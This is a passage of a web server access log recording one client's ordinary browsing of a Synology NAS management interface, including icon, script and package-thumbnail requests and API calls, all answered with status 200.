10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynoFinder/images/icon/UniversalSearch_{0}.png&app_version=1.6.1-0542" [Client 84.1.26.27] [Length 7016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/DownloadStation/images/download_station_{0}.png&app_version=3.9.5-4627" [Client 84.1.26.27] [Length 3665] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/DirectoryServer/images/LDAPServer_{0}.png&app_version=2.4.59-2711" [Client 84.1.26.27] [Length 6427] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/OAuthService/images/Authenticator_{0}.png&app_version=1.1.2-0071" [Client 84.1.26.27] [Length 8577] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/ScsiTarget/images/SANManager_{0}.png" [Client 84.1.26.27] [Length 6469] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/CodecPack/images/icon/AME_{0}.png&app_version=3.0.1-2004" [Client 84.1.26.27] [Length 5961] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebService/images/d565d4b0-c664-46d3-8828-6cfc10232149/icon_{0}.png" [Client 84.1.26.27] [Length 5901] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/MariaDB10/images/MariaDB_{0}.png&app_version=10.3.32-1040" [Client 84.1.26.27] [Length 3853] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/ActiveInsight/images/ActiveInsight_{0}.png&app_version=2.1.3-2606" [Client 84.1.26.27] [Length 2957] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 5265] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 423] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/synosecurityscan.js?v=1.0&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 19491] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 12224] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 12972] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/audio-utils.js?v=7.0.3-5401&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 16559] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/SoundManager2.js?v=7.0.3-5401&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 21503] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/webdavserver.js?v=2.4.8-10135&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 5798] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/MusicTagEditor.js?v=7.0.3-5401&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 9860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/audio-core.js?v=7.0.3-5401&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 34106] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 2025] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AudioStation/audio-common.js?v=7.0.3-5401&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 82095] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 10293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/ScsiTarget/iscsi.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 87244] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/clipboard.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/QRCodeDialog.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 631] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileSaver.min.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1261] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileTask.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 441] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCE.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 874] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileUploader.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 10806] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/syno_clipboard.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1517] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SharingManager/SharingManager.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6253] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/jszip.min.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 26662] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileProperty.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 23510] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowser.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 131703] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_icn_status.png?v=383dac1d9a4ac4963c23b6584830ac71" [Client 84.1.26.27] [Length 1039] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[15/Jan/2026:13:51:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_bt_expand.png?v=eff629ec6029324c65db11201908a4f5" [Client 84.1.26.27] [Length 786] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[15/Jan/2026:13:51:52 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/package_center_24.png?v=42962-s9" [Client 84.1.26.27] [Length 2062] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/637c3c82fdfed829fdbbe8cfe5b78b24.gif" [Client 84.1.26.27] [Length 2432] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_minimize.png?v=3904c68eb6bbf1b48049a98e7e439735" [Client 84.1.26.27] [Length 342] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_help.png?v=5e82ac965a2fb41f0af06a5638c1bf48" [Client 84.1.26.27] [Length 1110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/1x/sprite-s19f0e38f3d.png" [Client 84.1.26.27] [Length 2584] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/PkgManApp/style.css?v=1661757678" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/textfield_icn_search_filter.png?v=e8cd756c231384653a617238d1e779ae" [Client 84.1.26.27] [Length 1839] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:54 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/textfield_bt_clear.png?v=8f99cb4a84f808263737a9801cc59763" [Client 84.1.26.27] [Length 617] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 10645] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/1x/icon_category.png?v=a6ee278796d16d863e428519b7f0f8bd" [Client 84.1.26.27] [Length 5048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/PkgManApp/style.css?v=1661757678" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22phpMyAdmin%22&ver=%225.2.1-1078%22&size=64" [Client 84.1.26.27] [Length 5901] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22Node.js_v16%22&ver=%2216.20.2-1014%22&size=64" [Client 84.1.26.27] [Length 3319] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22SynologyPhotos%22&ver=%221.3.4-0340%22&size=64" [Client 84.1.26.27] [Length 6894] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22WebDAVServer%22&ver=%222.4.8-10135%22&size=64" [Client 84.1.26.27] [Length 7461] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Package.Thumb&method=get&version=1&SynoToken=MbvSA7Zte.JE6&name=%22VideoStation%22&ver=%223.0.7-2512%22&size=64" [Client 84.1.26.27] [Length 3943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:55 +0000] - 200 200 - GET https nas.profibot.hu 